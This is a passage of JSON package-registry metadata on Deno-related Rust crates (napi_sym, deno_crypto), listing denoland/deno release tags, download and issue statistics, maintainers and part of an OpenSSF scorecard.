:"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-25T23:04:12.095Z","dependent_packages_count":5,"downloads":320379,"downloads_period":"total","dependent_repos_count":1,"rankings":{"downloads":10.531512383364234,"dependent_repos_count":16.666163825614724,"dependent_packages_count":6.221528343439829,"stargazers_count":0.0022611133722244834,"forks_count":0.05803524322042841,"docker_downloads_count":6.750482392667631,"average":6.704997216946512},"purl":"pkg:cargo/napi_sym","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/napi_sym","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/napi_sym","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/napi_sym/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T19:48:12.804Z","issues_count":6610,"pull_requests_count":9623,"avg_time_to_close_issue":17236144.535497494,"avg_time_to_close_pull_request":1534358.7653889374,"issues_closed_count":3787,"pull_requests_closed_count":8008,"pull_request_authors_count":577,"issue_authors_count":2467,"avg_comments_per_issue":2.509531013615734,"avg_comments_per_pull_request":0.7160968512937753,"merged_pull_requests_count":6992,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":664,"past_year_pull_requests_count":1191,"past_year_avg_time_to_close_issue":1367826.3136363637,"past_year_avg_time_to_close_pull_request":1331942.9891472869,"past_year_issues_closed_count":220,"past_year_pull_requests_closed_count":645,"past_year_pull_request_authors_count":182,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.216867469879518,"past_year_avg_comments_per_pull_request":1.0839630562552478,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":474,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1789,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":386,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":188,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/napi_sym/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/napi_sym/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/napi_sym/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/napi_sym/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/napi_sym/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/napi_sym/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-08T07:01:34.999Z","updated_at":"2022-11-08T07:01:34.999Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:29.418Z","updated_at":"2023-07-18T22:41:29.418Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047296,"name":"deno_crypto","ecosystem":"cargo","description":"Web Cryptography API implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":277,"first_release_published_at":"2020-10-14T14:56:09.501Z","latest_release_published_at":"2026-08-27T15:22:05.553Z","latest_release_number":"0.272.0","last_synced_at":"2026-09-07T22:59:02.557Z","created_at":"2022-04-12T09:59:31.623Z","updated_at":"2026-09-07T22:59:02.557Z","registry_url":"https://crates.io/crates/deno_crypto/","install_command":"cargo install deno_crypto","documentation_url":"https://docs.rs/deno_crypto/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets 